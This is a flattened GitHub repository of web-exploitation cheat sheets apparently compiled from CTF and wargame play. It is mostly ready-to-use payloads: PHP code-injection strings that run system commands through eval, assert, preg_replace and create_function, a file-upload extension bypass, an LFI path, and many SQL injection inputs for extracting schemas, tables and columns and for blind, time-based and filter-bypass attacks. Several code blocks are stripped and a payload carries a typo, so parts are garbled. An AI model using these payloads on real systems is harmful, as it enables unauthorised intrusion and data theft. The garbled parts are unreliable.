├── README.md ├── codeexec.md ├── lfi.md ├── sqli.md ├── xss.md └── xxe.md /README.md: -------------------------------------------------------------------------------- 1 | # web-cheats 2 | This repo is a collection of exploits (cheats) of web-vulnerabilities encountered during participating in ctfs, wargames etc. 3 | 4 | * [SQL Injection](https://github.com/rnehra01/web-cheats/blob/master/sqli.md) 5 | * [Code-Injection](https://github.com/rnehra01/web-cheats/blob/master/codeexec.md) 6 | * [XSS](https://github.com/rnehra01/web-cheats/blob/master/xss.md) 7 | * [LFI](https://github.com/rnehra01/web-cheats/blob/master/lfi.md) 8 | * [XXE](https://github.com/rnehra01/web-cheats/blob/master/xxe.md) 9 | -------------------------------------------------------------------------------- /codeexec.md: -------------------------------------------------------------------------------- 1 | ###### `#` needs to be encoded when attacks are used through urls 2 | 3 | #### Beware of the following functions : 4 | ##eval 5 | 6 | ``` 7 | 11 | ``` 12 | 13 | _[attack]_ = `URL?name=";syslem("ls");#` 14 | 15 | ##assert() - identical to eval() 16 | ``` 17 | 21 | ``` 22 | _[attack]_ = `URL?name='.system("ls");#` 23 | 24 | ##preg_replace (with /e modifier) => preg_replace('/.*/e',...) - /e does an eval() on the match 25 | ``` 26 | 29 | ``` 30 | _[attack]_ = `URL?pattern=/.*/e&new=system("ls")&base=something` 31 | 32 | ##create_function 33 | ``` 34 | '.$order.',$b->'.$order.');')); 36 | ?> 37 | ``` 38 | _[attack]_ = `?order=id);}system('ls');#` 39 | 40 | include[_once] / require[_once] 41 | 42 | WildCard : A .php file can be uploaded bypassing preg_match('/\.php$/',$file) by name the file as .php2 or .php.blah so that apche doesn't know to handle the extension move to next one and run the php code 43 | -------------------------------------------------------------------------------- /lfi.md: -------------------------------------------------------------------------------- 1 | ### Some special paths 2 | 3 | * `/proc/self/environ` Another way to access it is using symlink (`/dev/fd` -> `/proc/self/fd`) 4 | -------------------------------------------------------------------------------- /sqli.md: -------------------------------------------------------------------------------- 1 | ###### In the following queries, `'` may not work sometimes, so { **\`**,`"` } can be tested 2 | ###### To comment out the remaining code, { `;#`,`;--`,`;//` } can be used 3 | ###### While doing sqli through urls, { `;#`,`;--`,`;//` } need to be encoded specially 4 | 5 | ### Finding no of columns in table _(Error-based SQLI)_ 6 | _[Vulnearable code]_ : `SELECT * FROM table_name WHERE username='$input_user' AND pass='$input_pass'` 7 | 8 | * _[$input_user]_ : `' UNION SELECT 1,2,3.. FROM table_name --` 9 | * _[$input_user]_ : `' ORDER BY n --` [If we get error for n, then n-1 will be no of columns] 10 | 11 | ### Limiting no of rows 12 | _[Vulnearable code]_ : `SELECT * FROM table_name WHERE username='$input_user' AND pass='$input_pass'` 13 | 14 | * _[$input_user]_ : `' OR 1=1 LIMIT 1 --` 15 | 16 | ## For Mysql 17 | _[Vulnearable code]_ : `SELECT * FROM table_name WHERE username='$input_user' AND pass='$input_pass'` 18 | ###### Assume no of columns to be 3 19 | #### Finding version and databases 20 | * _[$input_user]_ : `' UNION SELECT 1,@@version,database() --` 21 | 22 | #### Extracting Tables from databases 23 | * _[$input_user]_ : `' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()` 24 | 25 | #### Extracting columns from databases 26 | * _[$input_user]_ : `' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database()` 27 | * _[$input_user]_ : `' UNION SELECT table_name, column_name, 1 FROM information_schema.columns` 28 | 29 | ### Fetching a particular column without knowing column's name 30 | * `SELECT F.4 FROM (SELECT 1, 2, 3, 4 UNION SELECT * FROM users)F;` will fetch 4th column of `users`. 31 | 32 | It works because the column names of the table derived from the subselect are the values of the leftmost `SELECT` 33 | ## For Mssql 34 | _[Vulnearable code]_ : `SELECT * FROM table_name WHERE username='$input_user' AND pass='$input_pass'` 35 | ###### Assume no of columns to be 3 36 | #### Finding version and databases 37 | * _[$input_user]_ : `' UNION SELECT 1,@@version,db_name(i) --` [Here **i** is the i-th database present] 38 | * _[$input_user]_ : `' UNION SELECT 1,@@version,name FROM master..sysdatabases --` 39 | 40 | __[In MsSQL, if second colums is `username` then the payload `' UNION SELECT 1,1,name FROM master..sysdatabases --` won't work , second column MUST be a string. Interesting !!]__ 41 | 42 | ## For sqlite 43 | In sqlite __sqlite_master__ replaces __information_schema__ 44 | 45 | _[Vulnearable code]_ : `SELECT * FROM table_name WHERE username='$input_user' AND pass='$input_pass'` 46 | #### Extracting sqlite version 47 | _[$input_user]_ : `' UNION SELECT sqlite_version()` 48 | #### Extracting table names 49 | _[$input_user]_ : `' UNION SELECT name FROM sqlite_master WHERE type='table'` 50 | #### Extracting column names from a table 51 | _[$input_user]_ : `' UNION SELECT sql FROM sqlite_master WHERE type='table' AND tbl_name = 'table_name'` 52 | 53 | ## Blind SQLI 54 | _[Vulnearable code]_ : `SELECT * FROM table_name WHERE username='$input_user' AND pass='$input_pass'` 55 | 56 | * _[$input_user]_ : `' WHERE EXISTS(SELECT * FROM table_name WHERE username LIKE "%a%") --` [It will ask whether a user with letter "a" or "A" containing in his name] 57 | * _[$input_user]_ : `' WHERE EXISTS(SELECT * FROM table_name WHERE username LIKE "__a%") --` [It will ask whether the letter is at 3rd place or NOT] 58 | 59 | HERE `%`,`_` are WILDCARDS. `%` matches any string and `_` matches only one character 60 | 61 | * By default, LIKE is __case-insensitive__ 62 | 63 | _[$input_user]_ : `' WHERE EXISTS(SELECT * FROM table_name WHERE username LIKE BINARY "%a%") --` [To make a case sensitive search, use BINARY right after LIKE] 64 | 65 | ## Time-based Blind SQLI 66 | _[Vulnearable code]_ : `SELECT * FROM table_name WHERE username='$input_user' AND pass='$input_pass'` 67 | #### MySQLI 68 | * _[$input_user]_ : `' OR (SELECT SLEEP(10) FROM table_name WHERE username='something') --` 69 | * _[$input_user]_ : `' OR IF(username='something',SLEEP(10),0) --` 70 | 71 | [Produces a delayed response if username=`something` exists] 72 | #### SQLite 73 | * _[$input_user]_ : `' OR CONDITION='true' AND 1=randomblob(100000000) --` 74 | 75 | [Produces a delayed response if CONDITION='true'] 76 | 77 | ## Bypassing BLACKLISTED CHARS 78 | * `,` using `JOIN` 79 | 80 | `SELECT 1,2,3 FROM users` : `SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c` 81 | 82 | * Bypassing filtered `'`__[quote]__ (special case) 83 | 84 | ``` 85 | user = `\` & pass = `OR 1=1 --` 91 | 92 | ## Common-errs 93 | * `mysql` does a case insensitive search by default and also ignores the trailing spaces 94 | 95 | How to exploit that? 96 | 97 | A username `Admin` can be created and it can be used to sign-in as `admin` 98 | -------------------------------------------------------------------------------- /xss.md: -------------------------------------------------------------------------------- 1 | ### XSS 2 | 3 | * `` 4 | * `` 5 | -------------------------------------------------------------------------------- /xxe.md: -------------------------------------------------------------------------------- 1 | #### XXE with SVG 2 | ``` 3 | 4 | 6 | ]> 7 | 8 | &xxe; 9 | 10 | ``` 11 | This displays the results in rendered svg image. 12 | --------------------------------------------------------------------------------